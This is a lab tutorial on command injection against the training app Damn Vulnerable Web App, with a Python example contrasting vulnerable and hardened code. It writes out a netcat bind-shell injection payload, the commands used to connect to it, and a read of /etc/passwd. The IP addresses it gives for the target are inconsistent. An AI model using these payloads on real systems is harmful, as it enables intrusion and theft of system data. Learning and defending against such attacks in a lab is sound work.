In this post we are going to cover Command Injection Attack using NetCat on Damn Vulnerable Web App.
Background:
- What is Damn Vulnerable Web App (DVWA)?
- Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable.
- Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.
- What is Command Execution?
- Command Execution is where a website application provides the ability to execute system commands.
- What is a Command Injection Attack?
- The purpose of the command injection attack is to inject and execute commands specified by the attacker in the vulnerable application.
- In situations like this, the application, which executes unwanted system commands, is like a pseudo system shell, and the attacker may use it as an authorized system user.
- Note, the commands are executed with the same privileges as the application and/or web server.
- Command injection attacks are possible in most cases because of lack of correct input data validation, which can be manipulated by the attacker (forms, cookies, HTTP headers etc.).
- What is a Command Injection Listener Attack?
- A Command Injection Listener Attack is where a malicious user creates a backdoor listener using common network utilities such as netcat.
- Netcat is a computer networking service for reading from and writing to network connections using TCP or UDP.
- Unix/Linux Example: 9.9.9.9;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe
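Why the lack of input validation named above lets such a payload through, shown as an added Python example (not DVWA's own PHP code): the vulnerable string-concatenation pattern beside a hardened version that allow-lists a bare IP address and runs ping without a shell. The function names and the BENIGN sample are constructed for this example; PAYLOAD is the string quoted above.

```python
import ipaddress
import re
import subprocess
from typing import List, Optional

# Constructed sample inputs: a benign target and the payload quoted in this post.
BENIGN = "192.168.43.118"
PAYLOAD = "192.168.43.118;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe"

# Shell control operators that end one command and start another.
SEPARATORS = re.compile(r"\s*(?:\|\||&&|;|\||\n)\s*")

def vulnerable_ping_command(target: str) -> str:
    """The low-security DVWA pattern: the raw form field is concatenated into
    a command string handed to a shell. Every separator in the field yields
    an extra command running with the web server's privileges."""
    return "ping -c 1 " + target

def shell_command_count(command: str) -> int:
    """How many separate commands a POSIX shell would run for this string."""
    return len([part for part in SEPARATORS.split(command) if part])

def validate_target(target: str) -> Optional[str]:
    """Allow-list check: accept only a literal IPv4/IPv6 address, else None.
    Anything else, including the payload above, is rejected outright."""
    try:
        return str(ipaddress.ip_address(target.strip()))
    except ValueError:
        return None

def hardened_ping_argv(target: str) -> Optional[List[str]]:
    """Validated target passed as its own argv element with no shell in between,
    so separators and redirections are never interpreted. None if rejected."""
    addr = validate_target(target)
    if addr is None:
        return None
    return ["ping", "-c", "1", addr]

def run_ping(target: str) -> str:
    """Execute the hardened form (argv list; subprocess defaults to shell=False)."""
    argv = hardened_ping_argv(target)
    if argv is None:
        raise ValueError("target must be a bare IP address")
    return subprocess.run(argv, capture_output=True, text=True, timeout=10).stdout

if __name__ == "__main__":
    print(shell_command_count(vulnerable_ping_command(PAYLOAD)))  # 4
    print(hardened_ping_argv(PAYLOAD))                            # None
    print(hardened_ping_argv(BENIGN))   # ['ping', '-c', '1', '192.168.43.118']
```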
Lab:
1) Access DVWA application on your browser.
2) Click on Command Injection
3) Pass the data below as the argument in the text box and click on Submit.
192.168.43.118;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe
- Make a FIFO named pipe.
- Pipes allow separate processes to communicate without having been designed explicitly to work together.
- This will allow two processes to connect to netcat.
- nc -l 4444, tells netcat to listen and allow connections on port 4444.
- 192.168.43.118 is the IP address of the DVWA application.
4) Step 3 opens a back door for accessing the DVWA machine.
5) Now Login to your Kali Linux machine.
6) Now Use NetCat on Kali Linux to access DVWA instance.
- nc 192.168.43.209 4444
- Use Kali Linux to Connect to DVWA Netcat session on port 4444
- hostname
- This is server hostname that hosts DVWA.
- cat /etc/passwd
- Show content of the /etc/passwd file
Like this we can perform any operation on DVWA instance from Kali Linux as long as we have NetCat session running on DVWA machine.